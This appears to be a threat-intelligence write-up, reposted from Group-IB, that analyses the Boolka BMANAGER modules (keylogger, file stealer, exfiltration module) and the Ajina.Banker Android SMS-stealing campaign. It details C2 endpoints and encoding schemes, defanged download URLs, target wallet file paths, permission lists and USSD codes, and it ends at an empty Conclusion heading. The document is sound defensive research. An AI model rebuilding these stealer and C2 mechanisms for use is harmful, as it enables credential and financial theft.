opera.exe,msedge.exe,chrome.exe,firefox.exe,HxOutlook.exe,HxAccounts.exe,EXCEL.EXE,SearchApp.exe,WindowsTerminal.exe,TextInputHost.exe,ShellExperienceHost.exe,ScreenClippingHost.exe,WhatsApp.exe,Spotify.exe,Steam.exe,steamwebhelper.exe,Viber.exe,msedgewebview2.exe,AcWebBrowser.exe,Notepad.exe,Acrobat.exe,1Password.exe,AvastBrowser.exe,EpicGamesLauncher.exe,WinStore.App.exe,old_chrome.exe,mstsc.exe,wpscenter.exe,wpscloudsvr.exe,AutodeskDesktopApp.exe,TeamViewer.exe,Notion.exe,old_msedge.exe,thunderbird.exe,OUTLOOK.EXE,WINWORD.EXE,Tresorit.exe,fsbanking.exe,iCloudPasswords.exe,ooliveupdate.exe,opera_gx_splash.exe,888poker_installer.exe,888poker.exe,PokerStars.exe,PokerStarsBr.exe,poker.exe,FirstLogonAnim.exe

Response of C2 during time of analysis (29/02/2024)

This list of applications is stored in the local SQL database. The information can then be used by other modules to determine what applications to target.

Get additional malware

Last but not least the malware will attempt to retrieve additional executables from the active C2. These executables have thus far always been other malware samples. These samples are:

BMREADER
- Data exfiltration module
BMLOG
- Keylogger module
BMHOOK
- Windows hooking module
BMBACKUP
- File stealer module

It will send a GET request to the C2 to retrieve the applications to download and install.

/getinstall?guid={guid}

hxxps://updatebrower[.]com/download/bmbackup.txt;bmbackup;C:\Program Files\Full Browser Manager\1.0.0\bmbackup.exe;1;v 1.0.0
hxxps://updatebrower[.]com/download/bmhook.txt;bmhook;C:\Program Files\Full Browser Manager\1.0.0\bmhook.exe;1;v 1.0.0
hxxps://updatebrower[.]com/download/bmlog.txt;bmlog;C:\Program Files\Full Browser Manager\1.0.0\bmlog.exe;1;v 1.0.0
hxxps://updatebrower[.]com/download/bmreader.txt;bmreader;C:\Program Files\Full Browser Manager\1.0.0\bmreader.exe;1;v 1.0.0

Response of C2 during the time of analysis (29/02/2024).

These strings consist of parameters used by the BMANAGER malware. These parameters are separated using the semicolon (;) character. The parameters are as follows:

Download URL
- The URL from where to download the executable.
Windows task name
- The name of the Windows task to create/run/delete.
Executable dump path
- Where the downloaded executable is dumped on the victim device.
Function
- Whether to create a new Windows task for the executable, to run an existing Windows task, to create and run a Windows task, or to delete an existing Windows task.
- Possible values:
  - 1
    - Create new Windows task (which is set to start on login)
    - This will download the executable.
  - 2
    - Delete an existing Windows task
  - 3
    - Create a new Windows task (which is set to start on login) and run it immediately
    - This will download the executable.
  - 4
    - Run an existing Windows task
  - 5
    - Stop a currently running Windows task
    - This will also delete the executable.
Version
- A string value. This value is used to distinguish between versions of the malware.

To download an executable the malware sends a GET request to the given URL. The response is a list of Base64 encoded strings. These strings are decoded, ZLIB decompressed, and appended to the final executable file.

A new Windows task is created for this executable to start on login, and optionally the executable is started immediately.

After all applications have been downloaded, and all tasks have been performed, a message is sent back to the C2.

/install?guid={guid}&name={version}

The version being the version string found in the C2 response.

BMREADER

The BMREADER malware sends stolen data stored in the local SQL database to the active C2.

Features

Exfiltrates data stored in the local SQL database

C2 communication

Communication with the C2 is done via HTTP(S) GET requests.

Register with C2

On start-up the malware will retrieve a C2 to use for further communication. To make the first request the initial C2 that is used is set to the active C2 in the local SQL database.

/getnodes?guid={guid}&type=2
1. Expects a list of C2s as response.
/usednodes?guid={guid}&t=0&node={resultnode}
1. resultnode is set to the initial C2 address.
2. Only called if 1 did not return a list of C2s.
3. Expects a list of C2s as response.
/
1. Called for every C2 in the list.
2. Measures response time of C2s.
3. List of C2s is sorted based on response time from low to high.
/client?guid={guid}
1. Called for every C2 in the list.
2. Expects string “success”.
3. If “success” is returned it will stop going through the list of C2s.
/usednodes?guid={guid}&t=0&node={resultnode}
1. resultnode is set to the C2 the malware has chosen to connect to.
2. Sent to the initial C2.
3. If no C2 returns “success”, the initial C2 is used.

Sending stolen inputs

One of the values stored in the local SQL database that is exfiltrated by the BMREADER is a list of keyboard inputs. These keyboard inputs have been obtained by the BMLOG (keylogger) malware.

The following GET request is made to the connected C2.

/clientdata?guid={guid}&programm={programm}&title={titleencode}&vars={resultencode}
- guid being the GUID retrieved from the local SQL database
- programm being the path of the application from which the keys were logged
- titleencode being a ZLIB compressed and Base64 encoded string that is the window title from which the keys were logged
- resultencode being a ZLIB compressed and Base64 encoded string that is a combination of a number of values.

The “resultencode” string is created as follows:

“eventid={eventid}|||recid={recid}|||data={data}|||”
- eventid being the ID of the event that triggered the keylogging
- recid being the ID of the keylogging.
- data being the actual string of inputs stolen from the victim.

The logged keys sent are then removed from the local SQL database.

Sending known applications

Another value stored in the local SQL database, and sent to the C2 by the malware, are applications found to be running on the victim device. These applications are collected by the BMHOOK malware.

A GET request is made to the C2:

/clientprogramm?guid={guid}&vars={resultencode}
- guid being the random GUID obtained from the local SQL database.
- resultencode being a ZLIB compressed and Base64 encoded string consisting of all programs stored in the local SQL database

When the response to this request is a string value of “success” the SQL database is updated. This update sets all applications as having been sent. This prevents entries from being sent twice.

BMLOG

The BMLOG malware is a keylogger. It stores logged keys in a local SQL database.

It performs the keylogging using the Python keyboard module.

Due to the keyboard module logging keys globally, not per window, it uses the BMHOOK malware to record which window currently has keyboard focus.

It will only log keys for applications that have been set as targets. These targets are received by the BMANAGER malware from the C2 and stored in the local SQL database. The BMLOG malware reads these targets from that same database.

Features

Record keyboard inputs

Storing logged keys

Instead of sending logged keys to a C2 it stores them in a local SQL database.

The keylogger will continually log keys until either:

60 seconds of logging have passed
A different window gains keyboard focus

If either of these events occurs all inputs are stored as a single string in the local SQL database. After storage the keylogger will begin logging again.

The inputs are translated as follows:

For inputs a single character long (a, b, 1, 2, etc.) they are put in the string as is.
For space inputs a whitespace is appended to the string.
For tab inputs a “\t” character is appended to the string.
For other inputs the input is capitalized and placed between square brackets before being appended to the string.

Additional values stored alongside the input string are:

The event ID
The amount of recordings made for the logged application
The path to the logged application
The title of the window being keylogged
0 value to indicate the information has not yet been sent to the C2

The BMREADER application sends the logged keys to the C2.

BMHOOK

The BMHOOK malware uses Windows hooks to discover which applications are running on a victim device and which window/application has keyboard focus.

This sample stands out in its implementation in that it uses CPython and Windows APIs to install Windows hooks. This makes the sample function only on Windows.

Features

Install a Windows hook to trigger on a window receiving keyboard focus

Windows hooks

The BMHOOK malware uses the SetWinEventHook function to install a Windows hook. This hook is configured to trigger on win32con.EVENT_OBJECT_FOCUS events. This type of event occurs when a window receives keyboard focus.

The following actions occur when this event is triggered:

Use GetWindowTextW to retrieve the title of the hooked window.
Obtain the full path of the executable the window belongs to.
Insert these two values, and a unique ID value, into the local SQL database.
Insert the path to the application into the local SQL database, if it does not exist there already.

The BMREADER malware uses the information stored in the local SQL database to send to the C2. The BMLOG malware uses the information to determine which window/application is being keylogged.

BMBACKUP

The BMBACKUP malware is a file stealer. It checks for specific files retrieved from a C2. If it finds the files it will read them and send them to the C2.

Features

Retrieve paths of files to steal from C2
Exfiltrate stolen files to C2

C2 communication

Communication with the C2 occurs via HTTP(S) GET requests.

Register with C2

On start-up the malware will retrieve a C2 to use for further communication. To make the first request the initial C2 that is used is set to the active C2 in the local SQL database.

/getnodes?guid={guid}&type=2
1. Expects a list of C2s as response.
/usednodes?guid={guid}&t=0&node={resultnode}
1. Only called if 1 did not return a list of C2s.
2. Expects a list of C2s as response.
/
1. Called for every C2 in the list.
2. Measures response time of C2s.
3. List of C2s is sorted based on response time from low to high.
/client?guid={guid}
1. Called for every C2 in the list.
2. Expects string “success”.
3. If “success” is returned it will stop going through the list of C2s.
/usednodes?guid={guid}&t=0&node={resultnode}
1. Sent to the initial used for the first request.
2. resultnode is set to the C2 the malware has chosen to connect to.
3. If no C2 returns “success”, the initial C2 is used.

Get target files

The malware sends a request to the C2 every 60 seconds to retrieve a list of files to exfiltrate.

/getpaths?guid={guid}

The response consists of a list of strings. Each being an absolute path to a file to exfiltrate.

C:\*\*\AppData\Roaming\Bitcoin\wallets\*\wallet.dat
C:\*\*\AppData\Roaming\Bitcoin\wallets\wallet.dat

Response from C2 during the time of analysis (29/02/2024).

After making this request it will check each of these files whether they exist or not. If a file is found to exist the exfiltration process is initiated.

Exfiltrating files

The malware will go through the list of files to exfiltrate and check if they exist. When a file exists it will begin the exfiltration process.

A copy of the target file is made with a randomized name. This randomized name is a random UUID value ending with “.tmp”. This copy is placed in the users temporary directory (C:\Users\*\AppData\Local\Temp).
The copy file is read in 16384 byte chunks. Each of these chunks is sent to the C2 via a GET request.
1. /clientfiledata?guid={guid}&vars={resultencode}
2. resultencode being a Base64 encoded string containing the byte data.

resultencode is created in the following manner:

Up to 16384 bytes are read from the target backup file and converted to a hexadecimal string
The info string is created
- “partid={partid}|||partcount={partcount}|||hex={hex}|||fn={file}|||
  - partid is which chunk of the file this object is
  - partcount are the total amount of chunks the file consists of
  - hex are the bytes read from the file
  - file is the path and name of the original file (not the path and name of the backup file)
This info string is ZLIB compressed, Base64 encoded, and then made URL safe
This is the final resultencode object that is sent as a URL parameter

SQL database

Most samples make use of a local SQL database. The path and name of this database is hard-coded in the samples to be located at: C:\Users\{user}\AppData\Local\Temp\coollog.db, with user being the username of the logged in user.

The following is a map of the SQL database. This map contains all tables and fields used by the different malware samples. Do note that the tables are created by each sample as they use them. Thus if certain samples are not present on a device, these tables may not be present.

a map of the SQL database Boolka malware

Tables

clientguid
- Contains the randomly generated GUID used to identify the sample to the C2.
- Created by BMANAGER
mainnodes
- Contains a list of C2s, in particular the currently active C2.
- Created by BMANAGER
log
- Contains the keylogger data.
- Created by BMLOG
event
- Contains which applications/windows have/had keyboard focus.
- Created by BMHOOK
allprogramm
- Contains a list of applications whose window has received keyboard focus at one point.
- Created by BMHOOK
programms
- Contains a list of all applications that are to be targeted by other modules.
- Created by BMANAGER
files
- Contains a list of files that need to be exfiltrated to the C2.
- Created by BMBACKUP

Signing certificate

BMANAGER 2f10a81bc5a1aad7230cec197af987d00e5008edca205141ac74bc6219ea1802 is signed with a valid certificate by ООО ТАСК:

Serial number 75 69 94 1C 66 2A AD 5F E9 50 11 B1

According to its metadata the signer is i.shadrin@tacke.ru.

According to the company’s website they develop software, however there are few suspicious things:

The locale shown on the map differs from the address, which points to the town of Dmitrov in Moscow, Russia.
all buttons show static info which doesn’t correlate with their description

Based on public information the company consists of 4 people, and their CEO also runs 5 other small companies.

These facts lead to three different versions:

the certificate doesn’t belong to OOO ТАСК, and it was bought by a fraudster providing fake data to GlobalSign
the certificate was stolen from OOO ТАСК, which means that either infrastructure of ООО ТАСК was compromised or email i.shadrin@tacke.ru got compromised
ООО ТАСК or it’s employees anyhow involved into fraudulent operations

We can not confirm any of these versions. However we checked domain tacke.ru in the stealer logs cloud and didn’t find any occurrence.

Conclusion

The discovery of the Boolka’s activities sheds light on the evolving landscape of cyber threats. Starting from opportunistic SQL injection attacks in 2022 to the development of his own malware delivery platform and trojans like BMANAGER, Boolka’s operations demonstrate the group’s tactics have grown more sophisticated over time. The injection of malicious JavaScript snippets into vulnerable websites for data exfiltration, and then the use of the BeEF framework for malware delivery, reflects the step-by-step development of the attacker’s competencies.

The analysis reveals the complexity of the malware ecosystem employed by Boolka, with various components such as formstealing scripts, keyloggers, and file stealers orchestrated to achieve malicious objectives. Additionally, the investigation into the signing certificate used by the BMANAGER malware underscores the challenges in attribution and the potential involvement of legitimate entities in illicit activities.

Recommendations

Recommendations for end users:

Avoid clicking on suspicious links or downloading files from unknown sources.
Download apps and updates only from official sources.
Ensure that your operating systems, browsers, and all software are regularly updated.
Employ strong, unique passwords for different accounts and use a reputable password manager to keep track of them.
Enhance security by enabling multi-factor authentication (MFA) on your accounts wherever possible.
Ensure you have reliable and up-to-date security measures like anti-virus software in place to detect and remove threats.

Recommendations for website owners:

Conduct frequent security audits and vulnerability assessments to identify and fix potential weaknesses. Group-IB’s Penetration Testing services can help you minimize your susceptibility to web attacks. Our experts work with the latest methods and techniques curated by Group-IB Threat Intelligence to pinpoint assets vulnerable to web injection attacks, and more.
Use robust authentication protocols and require strong passwords for all users, along with multi-factor authentication.
Ensure all software, including plugins and content management systems, are updated with the latest security patches.
Deploy a WAF to monitor and filter malicious traffic targeting your web applications.
For advanced cybersecurity teams, we recommend using Group-IB’s Threat Intelligence system, which can be used to detect relevant threats as early as during their preparation stage. The built-in graph analysis tool enriched by data from the largest threat-actor database reveals links between attackers, their infrastructures, and their tools. Enriching cybersecurity with threat intelligence helps significantly strengthen an organization’s ability to counter attacks, including ones carried out by state-sponsored groups.
Provide regular training for your staff on the latest security practices and threat awareness.
Set up continuous website monitoring for suspicious activities and have an incident response plan ready in case of a breach.

Ajina attacks Central Asia: Story of an Uzbek Android Pandemic

Posted on October 2, 2024 - October 2, 2024 by Maq Verma

Discovered by Group-IB in May 2024, the Ajina.Banker malware is a major cyber threat in the Central Asia region, disguising itself as legitimate apps to steal banking information and intercept 2FA messages.

Introduction

In May 2024, Group-IB analysts discovered suspicious activity targeting bank customers in the Central Asia region. The threat actors have been spreading malicious Android malware designed to steal users’ personal and banking information, and potentially intercept 2FA messages. During the investigation, Group-IB discovered .APK files masquerading as legitimate applications that facilitated payments, banking, deliveries, and other daily uses. These malicious files were spread across Telegram channels.

After the initial analysis of this trojan, we discovered thousands of malicious samples. All the found samples were divided into several activity clusters, each to be separately studied and investigated in a series of articles. This article examines one of these clusters: meet the Ajina.Banker malware.

Ajina is a mythical spirit from Uzbek folklore, often depicted as a malevolent entity that embodies chaos and mischief. According to local legends, this spirit is known for its ability to shape-shift and deceive humans, leading them astray or causing them harm. We chose the name Ajina for this malware campaign because, much like the mythical spirit, the malware deceives users by masquerading as legitimate applications, leading them into a trap compromising their devices and causing significant harm.

Key Findings

During our research, we uncovered the ongoing malicious campaign that started from November 2023 to July 2024.
We found and analyzed approximately 1,400 unique samples of Android malware and identified changes between versions of the same malware.
The attacker has a network of affiliates motivated by financial gain, spreading Android banker malware that targets ordinary users.
Analysis of the file names, sample distribution methods, and other activities of the attackers suggests a cultural familiarity with the region in which they operate.
Analysis also shows that the evolution of this malware campaign is causing attacks to expand beyond the original region, causing more victims in other countries as well.

Threat Actor Profile

The starting point of the research

As part of its continuous monitoring and hunting procedures, Group-IB analysts discovered a malicious Android sample (SHA1 b04d7fa82e762ea9223fe258fcf036245b9e0e9c) that was uploaded to the VirusTotal platform from Uzbekistan via a web interface, and had an icon of a local tax authority app.

Figure 1. Screenshot of the sample found on the VirusTotal platform

Behavioral analysis has shown that the application tries to contact 109.120.135[.]42. Group-IB’s proprietary Graph Network Analysis tool reveals similar files that contacted the same server.

Figure 2. Screenshot of graph analysis of network infrastructure of the detected server

Our attention was also drawn to the package when our Fraud Protection solution detected the package org.zzzz.aaa in one of our client sessions. During our investigation, we found more samples on the VirusTotal platform. Our Fraud Analysts continued researching this malware and constructed a timeline of the campaign, identifying methods of distribution and targets.

Figure 3. Screenshot of Android Info summary with unique package name

Timeline

Ajina’s malicious campaign commenced in November 2023 and has persisted to present day. Initially the activities detected included the malware distribution through Telegram, encompassing a range of threats from malware-laden attachments to phishing attempts.

Ajina refined their tactics as the campaign progressed into February through March 2024, demonstrating heightened sophistication Social engineering techniques and the scale of the attack were increasingly leveraged to enhance the campaign’s efficiency. Based on Group-IB’s Fraud Protection system, we have plotted the following timeline of new infections.

Figure 4. New infections timeline

The timeline above illustrates the daily count of new infections, indicating a persistent and ongoing threat. This trend reveals that many users continually fall victim to the malware, leading to a steady increase in infections over time. The data shows that the adversary’s distribution techniques remain effective, successfully targeting new victims daily.

Malware distribution

Our analysis has revealed intensive attempts by Ajina to utilize messaging platforms, including Telegram, as a channel for disseminating malicious samples. Ajina orchestrated a widespread campaign by creating numerous Telegram accounts, leveraging these accounts to disseminate malware within regional community chats. Evidence suggests that this distribution process may have been partially automated, allowing for a more efficient and far-reaching spread of the malicious software.

To enhance their deception, Ajina crafted messages and sent links and files to lure unsuspecting users. The malware is often disguised as legitimate banking, government, or everyday utility applications, designed to exploit the trust users placed in these essential services in order to maximize infection rates and entice people to download and run the malicious file, thereby compromising their devices. This targeting method resulted in a widespread and damaging malware campaign that compromised numerous devices in the Central Asia region.

Techniques

Files with themes

To further entice potential victims, the adversary shared these malicious files in local Telegram chats, using a variety of deceptive methods. They crafted enticing giveaways and promotional messages that promised lucrative rewards, special offers, or exclusive access to sought-after services. In the following example, one of the following text messages was used for spreading files mimicking the local finance application (SHA1 5951640c2b95c6788cd6ec6ef9f66048a35d6070).

Figure 5.1 Screenshot of the message with the malicious file

Figure 5.2 Scan results on VirusTotal platform

Translated from Uzbek:

arrow_drop_down

These messages were designed to create a sense of urgency and excitement, prompting users to click on the links or download the files without suspecting any malicious intent. The use of themed messages and localized promotion strategies proved to be particularly effective in regional community chats. By tailoring their approach to the interests and needs of the local population, Ajina was able to significantly increase the likelihood of successful infections.

File spamming

Further analysis of Ajina’s distribution techniques revealed instances where they spammed messages containing only a malicious file attachment devoid of any accompanying text. This approach aimed to exploit the curiosity of users who might be inclined to open an unsolicited file or open it accidentally.

These spam campaigns were conducted across multiple accounts, sometimes even simultaneously, suggesting a highly coordinated effort. The simultaneous and widespread nature of these spam messages hints at the potential use of an automated distribution tool.

Figure 6. Screenshot of sending multiple messages

Link to Telegram channel

In addition to spamming messages with malicious attachments, Ajina also sent links to channels that hosted the malicious files, accompanied by promotional texts designed to engender trust and entice users to download the malware.

By directing users to external channels rather than sending files directly within the chat, Ajina aimed to circumvent the common security measures and restrictions imposed by many community chats. Sending files directly within a chat sometimes triggers automatic moderation and can lead to the adversary’s accounts being banned. However, by using links to external channels, they could bypass these restrictions, ensuring that their malicious content remained accessible to potential victims for a longer period of time.

This approach helped the adversary avoid detection and leveraged the trust users have in seemingly legitimate channels. Once users clicked on the link and entered the channel, they were inclined to believe that the files shared there were safe, especially when presented with convincing promotional texts. This strategy highlights the adversary’s adaptability and continuous efforts to refine their methods to evade security measures and maximize the reach of their malware campaign.

Figure 7.1 Screenshot of sending a link to channel

Figure 7.2 Content of channel

Link to web-resource

Some examples were found when the adversary sent links to web resources.

Figure 8. Screenshot of a message containing a link to web-resource

Accounts

Our investigation uncovered that the adversary established multiple accounts to execute their malicious campaign effectively. These accounts were meticulously set up to blend in with regular users and evade detection for as long as possible. Below, we provide detailed information on some of the identified accounts, including their account names, usernames, and user IDs, along with the volume of messages sent from each account.

Last Seen Name	INFINITOSSS MILLENNIUM	—	Barno Umarova	—	Оксана Цветкова
Last Seen Username	infinitosss	—	—	—	—
User ID	6571903171	6856449327	6824678523	6477339333	7027991392
Number of messages	238	175	76	54	25

Last Seen Name	Ренат	Алевтина!	Эмилия!	Святослав Пономарев	Eduard Bocan
Last Seen Username	—	—	—	—	EduardBocan
User ID	6406880636	7119728862	6556126401	7158481885	6125515928
Number of messages	16	48	46	10	43

Last Seen Name	Никон Дементьев	Эрнест Щербаков	شوكت	Лукия Рыбакова	Нинель Мамонтова
Last Seen Username	—	—	—	—	—
User ID	7133377920	6887020479	5526643036	6344107060	6701781993
Number of messages	7	2	2	9	13

Last Seen Name	Jason99	Linda Castaneda	Alicia Willis	Андреева Родригес
Last Seen Username	—	—	—	Andreeva_5676
User ID	6553097862	6574219148	5668418863	6716964266
Number of messages	2	1	3	1

These accounts were used to distribute the malware through various local community chats. By using multiple accounts, sometimes simultaneously, the adversary was able to increase the reach and frequency of their malicious content. The adversary’s ability to maintain and operate numerous accounts simultaneously, while consistently delivering tailored messages, suggests the possible use of automated distribution tools. These tools enabled the adversary to manage large-scale operations with precision, further amplifying the impact of their malicious campaign. This approach to account management indicates a high level of planning and coordination.

Malware analysis

Fraud Protection telemetry found 1,402 packages with package names com.example.smshandler (187 samples) and org.zzzz.aaa (1,215 samples) between 30 November 2023 and 31 July 2024 across 5,197 devices. Analyzed samples share a common code structure and subset of permissions that are requested.

The first known infection occurred at 30 November 2023 via package name com.example.smshandler (SHA1 cc6af149f1da110a570241dde6e3cfd0852cb0d8) with permission list:

[
	"android.permission.READ_PHONE_STATE",
	"android.permission.RECEIVE_BOOT_COMPLETED",
	"android.permission.RECEIVE_SMS",
	"android.permission.ACCESS_WIFI_STATE",
	"android.permission.BROADCAST_SMS",
	"android.permission.DUMP",
	"android.permission.INTERNET",
	"android.permission.READ_PHONE_NUMBERS",
	"android.permission.ACCESS_NETWORK_STATE",
	"android.permission.CALL_PHONE",
	"com.example.smshandler.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION",
	"android.permission.READ_SMS"
]

Ajina.Banker.A

According to Fraud Protection telemetry data, the first known sample of this malware uploaded to VirusTotal is “Узбек �екс 🔞🔞🔞” (SHA1 84af2ce3a2e58cc8a70d4cc95916cbfe15f2169e). It was uploaded to the VirusTotal platform in January 2024, providing the initial glimpse into this malicious campaign.

Figure 9. Detections at the moment of analysis

Once the trojan is launched it connects to the gate server 79[.]137[.]205[.]212:8080, generates AES encryption key, and sends it to the gate server along with a hard-coded worker’s name and userId that is also stored into SharedPreferences.

Figure 10. Initialization of the trojan

Figure 11. Base-64 encoded string sent to server

Figure 12. Decoded payload

This message is base64-encoded JSON:

{
	"key": "base64-encoded AES key",
	"action": 1,
	"worker": "Ares",
	"id": "c23aaac5774d4992a8d68de5eaf28535"
}

All messages except action 1 are encrypted with AES/GCM/NoPadding cipher suite.

Further research shows that messages are JSON-encoded, but are sent via raw TCP socket, not wrapped in HTTP. The general structure of messages contains a numeric action field with action type and other fields with arbitrary data depending on the action type. For example, if something goes wrong, the trojan sends a message to the gate server with the following structure:

{
	"action": 5,
	"msg": "string representation of the occured exception"
}

From the victim’s point of view, once the trojan is initiated, it loads a background image from an external legit resource and requests the user to grant these permissions:

[
"android.permission.READ_PHONE_STATE",
"android.permission.CALL_PHONE",
"android.permission.READ_PHONE_NUMBERS",

"android.permission.RECEIVE_SMS",
"android.permission.READ_SMS"
]

Figure 13. The only activity in the trojan (censored)

If permissions are granted via system dialog, the trojan disables the activity thus prevents launching an application UI again from the OS launcher.

setComponentEnabledSetting(componentName, PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP)

Figure 14. Prevention of further launching

If the user grants permissions via their mobile device’s operating system settings menu, the trojan then launches an intent that activates a third-party application related to trojan’s legend:

Figure 15. Starting a third-party activity

If permissions are not granted, the trojan sends a notification to the gate server (action 6).

When permissions are granted, the trojan collects information from the infected device and sends it to the gate server (action 3). The following is the list of information collected:

for each active SIM card
- MCC+MNC codes of current registered operator
- Name of the current registered operator
- ISO-3166-1 alpha-2 country code equivalent of the MCC (Mobile Country Code) of the current registered operator or the cell nearby
- ISO-3166-1 alpha-2 country code equivalent for the SIM provider’s country code
- MCC+MNC codes of the provider of the SIM
- Service Provider Name (SPN)
- Phone number
- Is SPN “known” or not

list of installed financial applications originated from Armenia, Azerbaijan, Iceland, Kazakhstan, Kyrgyzstan, Pakistan, Russia, Uzbekistan and some international ones
sent SMS
- Recipient
- Body
- Date
received SMS
- Sender
- Body
- Date

The trojan abuses the <queries> element in the app’s manifest instead of abusing QUERY_ALL_PACKAGES permission, and therefore it can get information only about what is declared in manifest packages. However, it does not prevent the expansion of the list of targets for a particular sample because Trojan will send to the gate server every incoming SMS, including for banks not included in the list of targets (action 2). This allows, for example, the initial registration of accounts in organizations that are not the target of the trojan.

Figure 16. Broadcast receiver for incoming SMSes

While collecting SIM-card info, the trojan checks if the SPN is “known” and, if it is, sends a Unstructured Supplementary Service Data (USSD) request to get the phone number of the active SIM cards from the victim’s device.

Country	USSD
Armenia	*187#
	*420#
	*525#
Azerbaijan	*137#
	*540#
	*666#
Kazakhstan	*160#
Kyrgyzstan	*112#
Kyrgyzstan	*212#
Russia	*100#
	*103#
	1110887#
	116106#
	*200#
	*201#
	*205#
	*303#
Tajikistan	*111#
Tajikistan	*99#
Ukraine	*161#
Ukraine	*61#
Uzbekistan	1004#
	*150#
	*303#
	*450#
	*664579#

After this USSD response is received, the trojan sends the response info to the gate server (action 4):

Figure 17. USSD response callback

There is no difference between samples with com.example.smshandler package name from first and last infections with publicly available samples.

Ajina.Banker.B

We gathered several samples from the org.zzzz.aaa group and found little differences in the code structure. Further analysis of the appearance of new samples and code similarities lead us to the conclusion that this family is still under active development, and we can suggest that org.zzzz.aaa is the new version of the same family as com.example.smshandler.

Figure 18. New samples stats

As shown above, another group of samples has the org.zzzz.aaa package name. The first known infection occurred on February 18 2024, while the earliest publicly available sample was detected on 20 February 2024, and is still the most downloaded for now.

One of the freshest samples has an interesting but less popular difference. It is a new execution flow branch showing another view instead of just a background image. Based on the names of variables of type TextInputEditText, we assume that this is something like a phishing page, but we are not able to trigger this branch.

Figure 19. New activity layout

Along with this new View there is a new action 7 message for sending user-provided phone number, bank card number and PIN-code.

Figure 20.The user-inputed card info is sent to gate server

It appears that this new feature is developed to primarily target users in Azerbaijan because of the hard-coded phone number prefix and text language on the Toast popup.

There are some additional features that are common for most of analyzed org.zzzz.aaa samples:

new packages of interest
Accessibility Service abuse:
- prevent uninstallation
- grant permissions

Requests for additional permissions. However, we did not found calls of Android Platform API in the analyzed samples that requires such permissions
- READ_CALL_LOG
- GET_ACCOUNTS
- READ_CONTACTS
Opens another legitimate app instead of a browser when permissions are granted

There are several examples of layouts from discovered samples with various legends:

Figure 21.1 Example of interface of the new samples

Figure 21.2 Example of interface of the new samples

Figure 21.3 Example of interface of the new samples

Figure 21.4 Example of interface of the new samples

Infrastructure

As mentioned before, the malware only sends exfiltrated data over raw TCP in JSON to the gate server. There were no capabilities to receive commands found. But we’ve managed to find a web panel of “SMS handler”, which refers us to the version of package name com.example.smshandler. It’s possible to find further servers by the same response, using search by body hash (SHA1 1a9c98808a547d4b50cc31d46e19045bcd2cfc1b).

Figure 22.1 Discovery of the “SMS handler” Web Panel

Figure 22.2 Scan result for responses containing Web Panel

On all of the adversaries servers we can find certificates with “WIN-PDDC81NCU8C” issuer and subject common name. However, this common name is generic and widely used by a specific hosting service according to Shodan.

Figure 23.1 Certificate found on gate server

Figure 23.2 Number of certificates with the same common name

We’ve seen 9 servers involved in this campaign, some of them shared the same Etags (e.g. 1718668565.8504026-495-535763281). Network infrastructure involved in this attack is shown on the graph analysis below.

Figure 24. Screenshot of graph analysis of network infrastructure

Targets

As we’ve mentioned above, one significant aspect of our findings is based on the analysis of Android package names utilized in this campaign. Many of these packages mimicked popular regional apps, such as local banking applications, government service portals, or everyday utility tools. By replicating the appearance of these trusted applications, the adversary increased the likelihood of users downloading and installing the malware. So the displayed names can be a trustworthy indication of the target region.

Analysis indicates that most of these malware samples were specifically designed to target users in Uzbekistan, suggesting that the adversary deliberately focused on this region. But there are also a few other regions that have been targeted by the adversary. The main reason is that the samples have hardcoded checks for attributes distinctive for other countries. We’ve also seen AM-CERT (National CERT/CSIRT Armenia) reporting this campaign.

During the analysis we’ve also found the use of specific country phone provider codes embedded within the malicious APKs. These codes indicate that the adversary has an even wider pool of target countries. The adversary checks for Service Provider Network (SPN) and then sends a Unstructured Supplementary Service Data (USSD) request to get the phone number of the active SIM cards from the victim’s device. Based on this we can assume potential regions of interest, from where the user data could be possibly stolen.

Figure 25. Distribution of supported SPNs and apps of interest per country hardcoded in sample

Attribution

The analysis of the malware has shown that the malicious files contain data about different affiliates. This leads us to conclude that it’s based on an affiliate programme, where the support for the initial project is led by a small group of people, and all the distribution and infection chains are made by affiliates working for the percentage.

Sample named “Вип Контент.apk” – “VIP Content.apk” in english – (SHA1 b4b9562a9f4851cba5761b1341f58f324f258123) was seen by MalwareHunterTeam and mentioned in Twitter post in January 28, 2024. One of the replies written to the post by APK–47 highlights an interesting username hardcoded as a name of one of the workers. The username “@glavnyypouzbekam” leads to the Telegram account named “Travis Bek” with description “Главный по узбекам” which means “Chief for Uzbeks”.

Figure 26.1 Screenshot of the Twitter post by APK–47

Figure 26.2 Screenshot of the Twitter post by APK-47

Group-IB Threat Intelligence system has found the following activity related to the Telegram account mentioned. Adversary participated in programmers chats, searched for “Java coder” and, according to his message, to an existing team. Detected user activity is shown on the figures below.

Figure 27.1 User activity found by Group-IB Threat Intelligence

Figure 27.2 User activity found by Group-IB Threat Intelligence

We’ve also found a Telegram bot connected to this campaign by username “@glavnyypouzbekam” contained in its description. Bot with the username “@glavnyypouzbekambot” has information about the possibility of earning money online and an invitation to join written in Russian.

Figure 28.1 Telegram bot found during the investigation

Figure 28.2 Telegram bot found during the investigation

We assume that highly likely due to its uniqueness, the hardcoded worker’s name “@glavnyypouzbekam” is connected to the discovered Telegram activity. Based on our findings, we assume that the adversary standing behind this account is one of the operators of the Ajina malicious campaign. The hiring of Java coders, created Telegram bot with the proposal of earning some money, also indicates that the tool is in the process of active development and has support of a network of affiliated employees. Worth noting, that soon after the adversary’s name was posted on Twitter, current Telegram account was deleted.

Prevention

To protect Group-IB customers from threats related to Ajina.Banker malware and other similar threats, Group-IB Fraud Protection uses events/rules to detect and prevent Ajina.Banker and other similar malware:

For confirmed malware samples Ajina.Banker:

Group-IB’s Fraud Protection maintains an extensive database of all detected malware. When our system detects applications from the list of mobile Trojans downloaded to an end-users device, we trigger the appropriate events to notify our customers promptly.

Figure 29. Screenshot of event from Group-IB Fraud Protection system

When the malware is detected on the user’s device:

Once the trojan is successful, sensitive customer data typically falls into the hands of the threat actor, who then seeks to monetize this data. Often, the threat actor or their software will log into the stolen account. In such cases, a new device may appear when accessing the user account. Consequently, a rule has been developed to monitor accounts where a mobile banking trojan has been confirmed and to detect logins from new devices.

When new versions of a given Trojan family appear:

For cases where the malware has not yet been added to the malware database, a new rule has been developed that focuses on the trojan’s specific characteristics. In particular, we check the characteristics of all software from a non-legitimate source for the ability to read SMS. These alerts are also transmitted to banks in the form of specific event types, increasing the likelihood of preventing fraudulent transactions by threats.

Figure 30. Screenshot of event from Group-IB Fraud Protection system

Conclusion

